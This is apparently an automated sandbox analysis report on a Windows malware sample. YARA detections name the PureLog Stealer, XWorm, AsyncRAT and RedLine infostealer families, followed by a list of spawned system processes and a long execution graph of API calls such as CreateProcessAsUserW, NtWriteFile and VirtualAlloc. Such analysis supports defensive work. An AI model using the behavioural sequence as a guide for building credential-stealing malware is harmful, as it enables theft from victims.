• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:true

Target ID:39
Start time:03:23:41
Start date:01/11/2024
Path:C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWow64\perfhost.exe
Imagebase:0x400000
File size:1'150'976 bytes
MD5 hash:66E9108DA1C020C738D8EA65CDBF5BE1
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:44
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'141'248 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:525F4AE8B0B51CA29D93DB1875D48945
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:46
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'846'784 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:78D3D3C671FAB25B9BF6149AD1D00F30
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:47
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'146'880 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:16010E8846BCE27721A406159D8AE296
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:48
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5B5A04180D3C1BE14C02BA823EFE4460
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:49
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false


Execution Graph

Execution Coverage:16%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:26.8%
Total number of Nodes:1857
Total number of Limit Nodes:15
35085 2b089d0 20 API calls 35084->35085 35086 2b1406b 35085->35086 36610 2b0e358 35086->36610 35089 2b14091 35090 2b140a2 35089->35090 36615 2b0dc8c 35090->36615 35093 2af4860 11 API calls 35094 2b140f1 35093->35094 35095 2b140fc 35094->35095 35096 2af47ec 11 API calls 35095->35096 35097 2b14128 35096->35097 35098 2b14133 35097->35098 35099 2b089d0 20 API calls 35098->35099 35100 2b1414c 35099->35100 35101 2af4860 11 API calls 35100->35101 35102 2b1416d 35101->35102 35103 2af47ec 11 API calls 35102->35103 35104 2b141a4 35103->35104 35105 2b141af 35104->35105 35106 2b089d0 20 API calls 35105->35106 35107 2b141c8 35106->35107 35108 2b088b8 20 API calls 35107->35108 35109 2b141cd 35108->35109 35110 2b141d7 35109->35110 36630 2b0e678 35110->36630 35113 2af4860 11 API calls 35114 2b14217 35113->35114 35115 2b1422f 35114->35115 35116 2af47ec 11 API calls 35115->35116 35117 2b1424e 35116->35117 35118 2b14259 35117->35118 35119 2b089d0 20 API calls 35118->35119 35120 2b14272 Sleep 35119->35120 35121 2af4860 11 API calls 35120->35121 35122 2b1429d 35121->35122 35123 2b142b5 35122->35123 35124 2af47ec 11 API calls 35123->35124 35125 2b142d4 35124->35125 35126 2b142df 35125->35126 36769 2af46d4 35126->36769 36591 2b089e4 36590->36591 36592 2b081cc 17 API calls 36591->36592 36593 2b08a1d 36592->36593 36594 2b08274 15 API calls 36593->36594 36595 2b08a36 36594->36595 36596 2b07d78 18 API calls 36595->36596 36597 2b08a95 36596->36597 36771 2b08338 36597->36771 36600 2b08abc 36601 2af4500 11 API calls 36600->36601 36602 2b08ac9 36601->36602 36603 2b0f094 36602->36603 36607 2b0f0b9 36603->36607 36604 2b0f0e5 36606 2af44dc 11 API calls 36604->36606 36608 2b0f0fa 36606->36608 36607->36604 36783 2af46c4 11 API calls 36607->36783 36784 2af4530 11 API calls 36607->36784 36608->35055 36611 2af4bcc 11 API calls 36610->36611 36613 2b0e370 36611->36613 36612 2b0e391 36612->35089 36613->36612 36785 2af49f8 36613->36785 36616 2b0dca2 36615->36616 36791 2af4f20 36616->36791 36618 2b0dcaa 
36619 2b0dcca RtlDosPathNameToNtPathName_U 36618->36619 36795 2b0dbdc 36619->36795 36621 2b0dce6 NtCreateFile 36622 2b0dd11 36621->36622 36623 2af49f8 11 API calls 36622->36623 36624 2b0dd23 NtWriteFile NtClose 36623->36624 36625 2b0dd4d 36624->36625 36796 2af4c60 36625->36796 36628 2af44dc 11 API calls 36629 2b0dd5d Sleep 36628->36629 36629->35093 36631 2b0e681 36630->36631 36631->36631 36632 2af4860 11 API calls 36631->36632 36633 2b0e6ca 36632->36633 36634 2af47ec 11 API calls 36633->36634 36635 2b0e6ef 36634->36635 36636 2b089d0 20 API calls 36635->36636 36637 2b0e70a 36636->36637 36638 2af4860 11 API calls 36637->36638 36639 2b0e723 36638->36639 36640 2af47ec 11 API calls 36639->36640 36641 2b0e748 36640->36641 36642 2b089d0 20 API calls 36641->36642 36643 2b0e763 36642->36643 36644 2af4860 11 API calls 36643->36644 36645 2b0e77c 36644->36645 36646 2af47ec 11 API calls 36645->36646 36647 2b0e7a1 36646->36647 36648 2b089d0 20 API calls 36647->36648 36649 2b0e7bc 36648->36649 36650 2af4860 11 API calls 36649->36650 36651 2b0e7ee 36650->36651 36652 2b089d0 20 API calls 36651->36652 36653 2b0e838 36652->36653 36654 2af4860 11 API calls 36653->36654 36655 2b0e86f 36654->36655 36656 2af47ec 11 API calls 36655->36656 36657 2b0e894 36656->36657 36658 2b089d0 20 API calls 36657->36658 36659 2b0e8af 36658->36659 36660 2af4860 11 API calls 36659->36660 36661 2b0e8c8 36660->36661 36662 2af47ec 11 API calls 36661->36662 36663 2b0e8ed 36662->36663 36664 2b089d0 20 API calls 36663->36664 36665 2b0e908 36664->36665 36666 2af4860 11 API calls 36665->36666 36667 2b0e921 36666->36667 36668 2af47ec 11 API calls 36667->36668 36669 2b0e946 36668->36669 36670 2b089d0 20 API calls 36669->36670 36671 2b0e961 36670->36671 36799 2af7f2c 36671->36799 36673 2b0e985 36803 2b08788 36673->36803 36676 2af4860 11 API calls 36677 2b0ea0a 36676->36677 36678 2af47ec 11 API calls 36677->36678 36679 2b0ea3b 36678->36679 36680 2b089d0 20 API calls 36679->36680 36681 2b0ea5f 36680->36681 36682 
2af4860 11 API calls 36681->36682 36683 2b0ea7b 36682->36683 36684 2af47ec 11 API calls 36683->36684 36685 2b0eaac 36684->36685 36686 2b089d0 20 API calls 36685->36686 36687 2b0ead0 36686->36687 36688 2af4860 11 API calls 36687->36688 36689 2b0eaec 36688->36689 36690 2af47ec 11 API calls 36689->36690 36691 2b0eb1d 36690->36691 36692 2b089d0 20 API calls 36691->36692 36693 2b0eb41 36692->36693 36694 2af4860 11 API calls 36693->36694 36695 2b0eb5d 36694->36695 36696 2af47ec 11 API calls 36695->36696 36697 2b0eb7b 36696->36697 36815 2b0894c LoadLibraryW 36697->36815 36700 2af4860 11 API calls 36701 2b0ebac 36700->36701 36702 2af47ec 11 API calls 36701->36702 36703 2b0ebca 36702->36703 36704 2b0894c 21 API calls 36703->36704 36705 2b0ebdf 36704->36705 36706 2af4860 11 API calls 36705->36706 36707 2b0ebfb 36706->36707 36708 2af47ec 11 API calls 36707->36708 36709 2b0ec19 36708->36709 36710 2b0894c 21 API calls 36709->36710 36711 2b0ec2e 36710->36711 36712 2af4860 11 API calls 36711->36712 36713 2b0ec4a 36712->36713 36714 2af47ec 11 API calls 36713->36714 36715 2b0ec68 36714->36715 36716 2b0894c 21 API calls 36715->36716 36717 2b0ec7d 36716->36717 36718 2b0eee2 36717->36718 36719 2b0ec87 36717->36719 36721 2af4500 11 API calls 36718->36721 36720 2af4860 11 API calls 36719->36720 36724 2b0eca3 36720->36724 36722 2b0eeff 36721->36722 36723 2af4c60 SysFreeString 36722->36723 36725 2b0ef0a 36723->36725 36728 2af47ec 11 API calls 36724->36728 36726 2af4500 11 API calls 36725->36726 36727 2b0ef1a 36726->36727 36729 2af4c60 SysFreeString 36727->36729 36733 2b0ecd4 36728->36733 36730 2b0ef22 36729->36730 36731 2af4500 11 API calls 36730->36731 36732 2b0ef2f 36731->36732 36732->35113 36734 2b089d0 20 API calls 36733->36734 36735 2b0ecf8 36734->36735 36736 2af4860 11 API calls 36735->36736 36737 2b0ed14 36736->36737 36738 2af47ec 11 API calls 36737->36738 36739 2b0ed45 36738->36739 36740 2b089d0 20 API calls 36739->36740 36741 2b0ed69 WaitForSingleObject CloseHandle CloseHandle 
36740->36741 36742 2af4860 11 API calls 36741->36742 36743 2b0eda0 36742->36743 36744 2af47ec 11 API calls 36743->36744 36745 2b0edbe 36744->36745 36746 2b0894c 21 API calls 36745->36746 36747 2b0edd3 36746->36747 36748 2af4860 11 API calls 36747->36748 36749 2b0edef 36748->36749 36750 2af47ec 11 API calls 36749->36750 36751 2b0ee0d 36750->36751 36752 2b0894c 21 API calls 36751->36752 36753 2b0ee22 36752->36753 36754 2af4860 11 API calls 36753->36754 36755 2b0ee3e 36754->36755 36756 2af47ec 11 API calls 36755->36756 36757 2b0ee5c 36756->36757 36758 2b0894c 21 API calls 36757->36758 36759 2b0ee71 36758->36759 36760 2af4860 11 API calls 36759->36760 36761 2b0ee8d 36760->36761 36762 2af47ec 11 API calls 36761->36762 36763 2b0eeab 36762->36763 36764 2b0894c 21 API calls 36763->36764 36765 2b0eec0 36764->36765 36766 2b0894c 21 API calls 36765->36766 36767 2b0eed1 36766->36767 36768 2b0894c 21 API calls 36767->36768 36768->36718 36770 2af46da 36769->36770 36772 2af4530 11 API calls 36771->36772 36773 2b0835b 36772->36773 36774 2af4860 11 API calls 36773->36774 36775 2b0837a 36774->36775 36776 2b081cc 17 API calls 36775->36776 36777 2b0838d 36776->36777 36778 2b08274 15 API calls 36777->36778 36779 2b08393 FlushInstructionCache 36778->36779 36780 2b083b9 36779->36780 36781 2af44dc 11 API calls 36780->36781 36782 2b083c1 FreeLibrary 36781->36782 36782->36600 36783->36607 36784->36607 36786 2af49ac 36785->36786 36787 2af45a0 11 API calls 36786->36787 36789 2af49e7 36786->36789 36788 2af49c3 36787->36788 36788->36789 36790 2af2c2c 11 API calls 36788->36790 36789->36613 36790->36789 36792 2af4f3c 36791->36792 36793 2af4f26 SysAllocStringLen 36791->36793 36792->36618 36793->36792 36794 2af4c30 36793->36794 36794->36791 36795->36621 36797 2af4c66 SysFreeString 36796->36797 36798 2af4c74 36796->36798 36797->36798 36798->36628 36800 2af7f3f 36799->36800 36822 2af4a00 36800->36822 36804 2af4530 11 API calls 36803->36804 36805 2b087ab 36804->36805 36806 2af4860 11 API calls 
36805->36806 36807 2b087ca 36806->36807 36808 2b081cc 17 API calls 36807->36808 36809 2b087dd 36808->36809 36810 2b08274 15 API calls 36809->36810 36811 2b087e3 CreateProcessAsUserW 36810->36811 36812 2b08827 36811->36812 36813 2af44dc 11 API calls 36812->36813 36814 2b0882f 36813->36814 36814->36676 36816 2b08973 GetProcAddress 36815->36816 36817 2b089bb 36815->36817 36818 2b089b0 FreeLibrary 36816->36818 36819 2b0898d 36816->36819 36817->36700 36818->36817 36820 2b07d78 18 API calls 36819->36820 36821 2b089a5 36820->36821 36821->36818 36823 2af4a05 36822->36823 36824 2af4a32 36822->36824 36823->36824 36827 2af4a19 36823->36827 36825 2af44dc 11 API calls 36824->36825 36826 2af4a28 36825->36826 36826->36673 36829 2af45cc 36827->36829 36830 2af45a0 11 API calls 36829->36830 36831 2af45dc 36830->36831 36832 2af44dc 11 API calls 36831->36832 36833 2af45f4 36832->36833 36833->36826 36834 2af1c6c 36835 2af1c7c 36834->36835 36836 2af1d04 36834->36836 36839 2af1cc0 36835->36839 36843 2af1c89 36835->36843 36837 2af1d0d 36836->36837 36838 2af1f58 36836->36838 36841 2af1d25 36837->36841 36856 2af1e24 36837->36856 36840 2af1fec 36838->36840 36846 2af1fac 36838->36846 36847 2af1f68 36838->36847 36842 2af1724 10 API calls 36839->36842 36849 2af1d2c 36841->36849 36852 2af1d48 36841->36852 36857 2af1dfc 36841->36857 36866 2af1cd7 36842->36866 36844 2af1c94 36843->36844 36882 2af1724 36843->36882 36854 2af1fb2 36846->36854 36858 2af1724 10 API calls 36846->36858 36850 2af1724 10 API calls 36847->36850 36848 2af1e7c 36851 2af1724 10 API calls 36848->36851 36869 2af1e95 36848->36869 36868 2af1f82 36850->36868 36871 2af1f2c 36851->36871 36861 2af1d79 Sleep 36852->36861 36874 2af1d9c 36852->36874 36853 2af1cfd 36855 2af1cb9 36856->36848 36860 2af1e55 Sleep 36856->36860 36856->36869 36862 2af1724 10 API calls 36857->36862 36873 2af1fc1 36858->36873 36859 2af1fa7 36860->36848 36863 2af1e6f Sleep 36860->36863 36864 2af1d91 Sleep 36861->36864 36861->36874 36877 2af1e05 36862->36877 
36863->36856 36864->36852 36865 2af1ca1 36865->36855 36906 2af1a8c 36865->36906 36866->36853 36867 2af1a8c 8 API calls 36866->36867 36867->36853 36868->36859 36875 2af1a8c 8 API calls 36868->36875 36871->36869 36876 2af1a8c 8 API calls 36871->36876 36872 2af1e1d 36873->36859 36878 2af1a8c 8 API calls 36873->36878 36875->36859 36879 2af1f50 36876->36879 36877->36872 36880 2af1a8c 8 API calls 36877->36880 36881 2af1fe4 36878->36881 36880->36872 36883 2af1968 36882->36883 36893 2af173c 36882->36893 36884 2af1938 36883->36884 36885 2af1a80 36883->36885 36890 2af1947 Sleep 36884->36890 36892 2af1986 36884->36892 36886 2af1a89 36885->36886 36887 2af1684 VirtualAlloc 36885->36887 36886->36865 36889 2af16af 36887->36889 36899 2af16bf 36887->36899 36888 2af175d 36888->36865 36923 2af1644 36889->36923 36890->36892 36897 2af195d Sleep 36890->36897 36891 2af174e 36891->36888 36896 2af182c 36891->36896 36900 2af180a Sleep 36891->36900 36901 2af15cc VirtualAlloc 36892->36901 36904 2af19a4 36892->36904 36893->36891 36894 2af17cb Sleep 36893->36894 36894->36891 36898 2af17e4 Sleep 36894->36898 36905 2af1838 36896->36905 36929 2af15cc 36896->36929 36897->36884 36898->36893 36899->36865 36900->36896 36902 2af1820 Sleep 36900->36902 36901->36904 36902->36891 36904->36865 36905->36865 36907 2af1b6c 36906->36907 36908 2af1aa1 36906->36908 36909 2af16e8 36907->36909 36910 2af1aa7 36907->36910 36908->36910 36911 2af1b13 Sleep 36908->36911 36913 2af1c66 36909->36913 36916 2af1644 2 API calls 36909->36916 36912 2af1ab0 36910->36912 36915 2af1b4b Sleep 36910->36915 36920 2af1b81 36910->36920 36911->36910 36914 2af1b2d Sleep 36911->36914 36912->36855 36913->36855 36914->36908 36917 2af1b61 Sleep 36915->36917 36915->36920 36918 2af16f5 VirtualFree 36916->36918 36917->36910 36919 2af170d 36918->36919 36919->36855 36921 2af1ba4 36920->36921 36922 2af1c00 VirtualFree 36920->36922 36921->36855 36922->36855 36924 2af1681 36923->36924 36925 2af164d 36923->36925 36924->36899 36925->36924 36926 
2af164f Sleep 36925->36926 36927 2af1664 36926->36927 36927->36924 36928 2af1668 Sleep 36927->36928 36928->36925 36933 2af1560 36929->36933 36931 2af15d4 VirtualAlloc 36932 2af15eb 36931->36932 36932->36905 36934 2af1500 36933->36934 36934->36931 36935 2b17074 36936 2af4860 11 API calls 36935->36936 36937 2b17095 36936->36937 36938 2af47ec 11 API calls 36937->36938 36939 2b170cc 36938->36939 36940 2b089d0 20 API calls 36939->36940 36941 2b170f0 36940->36941 36942 2af4860 11 API calls 36941->36942 36943 2b17111 36942->36943 36944 2af47ec 11 API calls 36943->36944 36945 2b17148 36944->36945 36946 2b089d0 20 API calls 36945->36946 36947 2b1716c 36946->36947 36948 2af4860 11 API calls 36947->36948 36949 2b1718d 36948->36949 36950 2af47ec 11 API calls 36949->36950 36951 2b171c4 36950->36951 36952 2b089d0 20 API calls 36951->36952 36953 2b171e8 36952->36953 36954 2af4860 11 API calls 36953->36954 36955 2b17209 36954->36955 36956 2af47ec 11 API calls 36955->36956 36957 2b17240 36956->36957 36958 2b089d0 20 API calls 36957->36958 36959 2b17264 36958->36959 36960 2af4860 11 API calls 36959->36960 36961 2b17285 36960->36961 36962 2af47ec 11 API calls 36961->36962 36963 2b172bc 36962->36963 36964 2b089d0 20 API calls 36963->36964 36965 2b172e0 36964->36965 36966 2af4860 11 API calls 36965->36966 36967 2b1731a 36966->36967 37756 2b0e0f8 36967->37756 36969 2b17349 37766 2b0f214 36969->37766 36972 2af4860 11 API calls 36973 2b17399 36972->36973 36974 2af47ec 11 API calls 36973->36974 36975 2b173d0 36974->36975 36976 2b089d0 20 API calls 36975->36976 36977 2b173f4 36976->36977 36978 2af4860 11 API calls 36977->36978 36979 2b17415 36978->36979 36980 2af47ec 11 API calls 36979->36980 36981 2b1744c 36980->36981 36982 2b089d0 20 API calls 36981->36982 36983 2b17470 36982->36983 36984 2af4860 11 API calls 36983->36984 36985 2b17491 36984->36985 36986 2af47ec 11 API calls 36985->36986 36987 2b174c8 36986->36987 36988 2b089d0 20 API calls 36987->36988 36989 2b174ec 36988->36989 36990 
2af4860 11 API calls 36989->36990 36991 2b1750d 36990->36991 36992 2af47ec 11 API calls 36991->36992 36993 2b17544 36992->36993 36994 2b089d0 20 API calls 36993->36994 36995 2b17568 36994->36995 36996 2af4860 11 API calls 36995->36996 36997 2b17589 36996->36997 36998 2af47ec 11 API calls 36997->36998 36999 2b175c0 36998->36999 37000 2b089d0 20 API calls 36999->37000 37001 2b175e4 37000->37001 37002 2af4860 11 API calls 37001->37002 37003 2b17605 37002->37003 37004 2af47ec 11 API calls 37003->37004 37005 2b1763c 37004->37005 37006 2b089d0 20 API calls 37005->37006 37007 2b17660 37006->37007 37008 2af4860 11 API calls 37007->37008 37009 2b17681 37008->37009 37010 2af47ec 11 API calls 37009->37010 37011 2b176b8 37010->37011 37012 2b089d0 20 API calls 37011->37012 37013 2b176dc 37012->37013 37014 2af4860 11 API calls 37013->37014 37015 2b176fd 37014->37015 37016 2af47ec 11 API calls 37015->37016 37017 2b17734 37016->37017 37018 2b089d0 20 API calls 37017->37018 37019 2b17758 37018->37019 37020 2af4860 11 API calls 37019->37020 37021 2b17779 37020->37021 37022 2af47ec 11 API calls 37021->37022 37023 2b177b0 37022->37023 37024 2b089d0 20 API calls 37023->37024 37025 2b177d4 37024->37025 37026 2b177e9 37025->37026 37027 2b18318 37025->37027 37029 2af4860 11 API calls 37026->37029 37028 2af4860 11 API calls 37027->37028 37031 2b18339 37028->37031 37030 2b1780a 37029->37030 37032 2af47ec 11 API calls 37030->37032 37033 2af47ec 11 API calls 37031->37033 37034 2b17841 37032->37034 37035 2b18370 37033->37035 37036 2b089d0 20 API calls 37034->37036 37037 2b089d0 20 API calls 37035->37037 37038 2b17865 37036->37038 37039 2b18394 37037->37039 37041 2af4860 11 API calls 37038->37041 37040 2af4860 11 API calls 37039->37040 37042 2b183b5 37040->37042 37043 2b17886 37041->37043 37045 2af47ec 11 API calls 37042->37045 37044 2af47ec 11 API calls 37043->37044 37046 2b178bd 37044->37046 37047 2b183ec 37045->37047 37048 2b089d0 20 API calls 37046->37048 37049 2b089d0 20 API calls 
37047->37049 37050 2b178e1 37048->37050 37051 2b18410 37049->37051 37052 2af4860 11 API calls 37050->37052 37053 2af4860 11 API calls 37051->37053 37055 2b17902 37052->37055 37054 2b18431 37053->37054 37056 2af47ec 11 API calls 37054->37056 37057 2af47ec 11 API calls 37055->37057 37059 2b18468 37056->37059 37058 2b17939 37057->37058 37060 2b089d0 20 API calls 37058->37060 37061 2b089d0 20 API calls 37059->37061 37062 2b1795d 37060->37062 37063 2b1848c 37061->37063 37064 2af47ec 11 API calls 37062->37064 37065 2af4860 11 API calls 37063->37065 37066 2b17975 37064->37066 37067 2b184ad 37065->37067 38183 2b085bc 37066->38183 37070 2af47ec 11 API calls 37067->37070 37073 2b184e4 37070->37073 37071 2af4860 11 API calls 37072 2b179a7 37071->37072 37074 2af47ec 11 API calls 37072->37074 37075 2b089d0 20 API calls 37073->37075 37077 2b179de 37074->37077 37076 2b18508 37075->37076 37078 2b193a1 37076->37078 37079 2b1851d 37076->37079 37082 2b089d0 20 API calls 37077->37082 37080 2af4860 11 API calls 37078->37080 37081 2af4860 11 API calls 37079->37081 37087 2b193c2 37080->37087 37083 2b1853e 37081->37083 37084 2b17a02 37082->37084 37086 2b18556 37083->37086 37085 2af4860 11 API calls 37084->37085 37091 2b17a23 37085->37091 37088 2af47ec 11 API calls 37086->37088 37089 2af47ec 11 API calls 37087->37089 37090 2b18575 37088->37090 37093 2b193f9 37089->37093 37094 2b1858d 37090->37094 37092 2af47ec 11 API calls 37091->37092 37097 2b17a5a 37092->37097 37095 2b089d0 20 API calls 37093->37095 37096 2b089d0 20 API calls 37094->37096 37098 2b1941d 37095->37098 37099 2b18599 37096->37099 37102 2b089d0 20 API calls 37097->37102 37100 2af4860 11 API calls 37098->37100 37101 2af4860 11 API calls 37099->37101 37106 2b1943e 37100->37106 37103 2b185ba 37101->37103 37104 2b17a7e 37102->37104 37107 2b185c5 37103->37107 37105 2af4860 11 API calls 37104->37105 37111 2b17a9f 37105->37111 37109 2af47ec 11 API calls 37106->37109 37108 2af47ec 11 API calls 37107->37108 37110 2b185f1 37108->37110 
37113 2b19475 37109->37113 37114 2b185fc 37110->37114 37112 2af47ec 11 API calls 37111->37112 37117 2b17ad6 37112->37117 37115 2b089d0 20 API calls 37113->37115 37116 2b089d0 20 API calls 37114->37116 37118 2b19499 37115->37118 37119 2b18615 37116->37119 37122 2b089d0 20 API calls 37117->37122 37120 2af4860 11 API calls 37118->37120 37121 2af4860 11 API calls 37119->37121 37123 2b194ba 37120->37123 37124 2b18636 37121->37124 37125 2b17afa 37122->37125 37126 2af47ec 11 API calls 37123->37126 37127 2af47ec 11 API calls 37124->37127 38195 2b0adf8 29 API calls 37125->38195 37132 2b194f1 37126->37132 37131 2b1866d 37127->37131 37129 2b17b21 37130 2af4860 11 API calls 37129->37130 37135 2b17b42 37130->37135 37134 2b089d0 20 API calls 37131->37134 37133 2b089d0 20 API calls 37132->37133 37144 2b19515 37133->37144 37136 2b18691 37134->37136 37138 2af47ec 11 API calls 37135->37138 37137 2af47ec 11 API calls 37136->37137 37139 2b186bd 37137->37139 37143 2b17b79 37138->37143 37142 2b186d5 37139->37142 37140 2b19cf5 37141 2af4860 11 API calls 37140->37141 37147 2b19d16 37141->37147 37148 2b186e0 CreateProcessAsUserW 37142->37148 37146 2b089d0 20 API calls 37143->37146 37144->37140 37145 2af4860 11 API calls 37144->37145 37157 2b19560 37145->37157 37149 2b17b9d 37146->37149 37154 2af47ec 11 API calls 37147->37154 37150 2b186f2 37148->37150 37151 2b1876e 37148->37151 37153 2af4860 11 API calls 37149->37153 37152 2af4860 11 API calls 37150->37152 37155 2af4860 11 API calls 37151->37155 37156 2b18713 37152->37156 37162 2b17bbe 37153->37162 37160 2b19d4d 37154->37160 37161 2b1878f 37155->37161 37158 2b1871e 37156->37158 37159 2af47ec 11 API calls 37157->37159 37166 2af47ec 11 API calls 37158->37166 37167 2b19597 37159->37167 37164 2b089d0 20 API calls 37160->37164 37165 2af47ec 11 API calls 37161->37165 37163 2af47ec 11 API calls 37162->37163 37173 2b17bf5 37163->37173 37168 2b19d71 37164->37168 37175 2b187c6 37165->37175 37169 2b1874a 37166->37169 37171 2b089d0 20 API calls 
